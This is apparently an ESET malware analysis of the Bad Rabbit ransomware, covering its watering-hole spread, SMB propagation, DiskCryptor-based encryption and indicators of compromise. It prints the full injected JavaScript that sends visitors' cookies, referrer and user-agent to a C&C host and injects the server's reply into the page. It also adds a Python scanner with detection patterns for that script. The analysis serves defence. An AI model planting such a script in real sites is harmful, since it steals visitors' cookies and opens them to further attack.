
Bad Rabbit: Petya is back
The Diskcoder.D (Bad Rabbit) ransomware attack, which began on October 24, hit companies in Russia and Ukraine, including the Kiev metro. This post collects the first results of our analysis of the malware.



Drive-by download attack using watering hole on popular sites
One way Bad Rabbit spreads is a drive-by download attack. The attackers compromised several popular websites by embedding JavaScript in their HTML code or in one of their .js files.
Below is a cleaned-up, readable version of the injected script:

function e(d) {
    var xhr = null;
    // Pick an XHR implementation: the native object first, then the legacy ActiveX variants
    if (!!window.XMLHttpRequest) {
        xhr = new XMLHttpRequest();
    } else if (!!window.ActiveXObject) {
        var xhrs = ['Microsoft.XMLHTTP', 'Msxml2.XMLHTTP', 'Msxml2.XMLHTTP.3.0', 'Msxml2.XMLHTTP.6.0'];
        for (var i = 0; i < xhrs.length; i++) {
            try {
                xhr = ActiveXObject(xhrs[i]);
                break;
            } catch (e) {}
        }
    }
    if (!!xhr) {
        // POST the collected visitor data to the C&C server (address defanged)
        xhr.open('POST', 'http://185.149.120\.3/scholargoogle/');
        xhr.timeout = 10000;
        xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4 && xhr.status == 200) {
                var resp = xhr.responseText;
                if (resp) {
                    // The server answers with JSON; its InjectionString is written straight into the DOM
                    var fans = JSON.parse(resp);
                    if (fans) {
                        var an_s = decodeURIComponent(fans.InjectionString).replace(/\+/g, '%20');
                        var da = document.createElement('div');
                        da.id = 'ans';
                        da.innerHTML = an_s;
                        document.body.appendChild(da);
                    }
                }
            }
        };
        // Serialize the collected fields as a form-encoded body
        var pd = [];
        for (var k in d) {
            if (d.hasOwnProperty(k)) {
                pd.push(k + '=' + d[k]);
            }
        }
        var dc = pd.join('&');
        xhr.send(dc);
    }
}
e({
    'agent': navigator.userAgent,
    'referer': document.referrer,
    'cookie': document.cookie,
    'domain': window.location.hostname,
    'c_state': !!document.cookie
});
The script sends the following information to 185.149.120[.]3, which appears to be unreachable at the moment:
- Browser user-agent
- Referrer
- Cookies from a visited site
- Domain name of visited site
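As an added example (not code from the original post or from ESET), here is a small Python scanner a site operator could run over their HTML and .js files to flag the injection shown above. It keys on the indicators the post documents: the C&C URL, the five exfiltrated fields, the JSON InjectionString, and the decodeURIComponent-to-innerHTML DOM write. The two sample scripts are constructed for the demonstration.

```python
import re

# Indicators taken from the injected script above. The C&C address is accepted
# in plain, "[.]" and "\." defanged forms so defanged copies of a page still match.
C2_URL_RE = re.compile(r"185\.149\.120(?:\[\.\]|\\\.|\.)3/scholargoogle/")
EXFIL_FIELDS = ("agent", "referer", "cookie", "domain", "c_state")
INJECT_RE = re.compile(r"JSON\.parse\([^)]*\)[\s\S]{0,200}?InjectionString")
DOM_RE = re.compile(r"decodeURIComponent\([^)]*\)[\s\S]{0,120}?\.innerHTML\s*=")


def scan_script(text):
    """Return the names of the indicators found in one HTML/JS file's text."""
    hits = []
    if C2_URL_RE.search(text):
        hits.append("c2_url")
    # Quoted object keys like 'agent': ... ; four of five fields is enough.
    found = [f for f in EXFIL_FIELDS if re.search(r"['\"]%s['\"]\s*:" % f, text)]
    if len(found) >= 4:
        hits.append("exfil_fields")
    if INJECT_RE.search(text):
        hits.append("injection_string")
    if DOM_RE.search(text):
        hits.append("dom_injection")
    return hits


def is_suspicious(text):
    """The C&C URL alone is decisive; otherwise require two behavioural indicators."""
    hits = scan_script(text)
    return "c2_url" in hits or len(hits) >= 2


def scan_files(contents):
    """Map file name -> indicator list for every file that looks suspicious."""
    return {name: scan_script(t) for name, t in contents.items() if is_suspicious(t)}


# Constructed samples: a harmless first-party analytics beacon and a fragment
# reproducing the injected script with the C&C address defanged.
BENIGN_SAMPLE = """
var x = new XMLHttpRequest();
x.open('POST', 'https://example.invalid/analytics');
x.send('agent=' + navigator.userAgent);
"""
INJECTED_SAMPLE = """
xhr.open('POST', 'http://185.149.120[.]3/scholargoogle/');
xhr.onreadystatechange = function() {
  var fans = JSON.parse(xhr.responseText);
  var an_s = decodeURIComponent(fans.InjectionString).replace(/\\+/g, '%20');
  var da = document.createElement('div');
  da.innerHTML = an_s;
};
e({'agent': navigator.userAgent, 'referer': document.referrer,
   'cookie': document.cookie, 'domain': window.location.hostname,
   'c_state': !!document.cookie});
"""
```

Running scan_files over a crawl of the site's own pages and scripts gives a quick first pass; any hit on c2_url should be treated as a confirmed compromise of that file.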
Server-side logic decides whether the visitor is of interest and, if so, returns content that is injected into the page. In the case we observed, this was a pop-up prompting the visitor to download a Flash Player update.

Clicking the Install button downloads an executable from 1dnscontrol[.]com. The executable, install_flash_player.exe, is the Win32/Filecoder.D dropper. The computer is then locked and a ransom message appears on the screen:
Page with payment information:

SMB Distribution
Win32/Diskcoder.D can also spread via SMB. Contrary to some media reports, it does NOT use the EternalBlue exploit (as Win32/Diskcoder.C, also known as Petya/NotPetya, did). Unlike its predecessor, Diskcoder.D scans the internal network for open network shares. It looks for the following shares:
admin
atsvc
browser
eventlog
lsarpc
netlogon
ntsvcs
spoolss
samr
srvsvc
scerpc
svcctl
wkssvc

Mimikatz is run on the infected machine to collect credentials. There is also a hard-coded list of usernames and passwords. Once valid credentials are found, the file infpub.dat is copied to the Windows directory of the target and executed using SCManager and rundll.exe.
Encryption
Win32/Diskcoder.D is a modified version of Win32/Diskcoder.C, known from the earlier Petya/NotPetya epidemic. The bugs in file encryption have been fixed. Encryption is now performed with DiskCryptor, legitimate open-source software designed to encrypt logical drives, removable USB drives and CD/DVD images, as well as bootable system partitions. The keys are generated with CryptGenRandom and then protected with a hard-coded RSA-2048 public key. Encrypted files are given the extension .encrypted. As before, the AES-128-CBC algorithm is used.

Spread
Interestingly, according to ESET telemetry, Ukraine accounts for 12.2% of detections of the dropper component. The statistics:
- Russia - 65%
- Ukraine - 12.2%
- Bulgaria - 10.2%
- Turkey - 6.4%
- Japan - 3.8%
- others - 2.4%
These statistics are largely consistent with the geographical distribution of the compromised sites hosting the malicious JavaScript. At the same time, Ukraine suffered more than any other country except Russia.
Note that the large companies were hit at about the same time. Possibly the group already had access to their networks and launched the watering hole attack at the same time as a decoy. It is not certain that all of the victims fell for the fake Flash Player update mentioned above. In any case, we are continuing to investigate the incident.
Samples

C&C Servers
Payment site: http://caforssztxqzf2nm[.]onion
Injection URL: http://185.149.120[.]3/scholargoogle/
Distribution URL: hxxp://1dnscontrol[.]com/flash_install.php
List of compromised sites: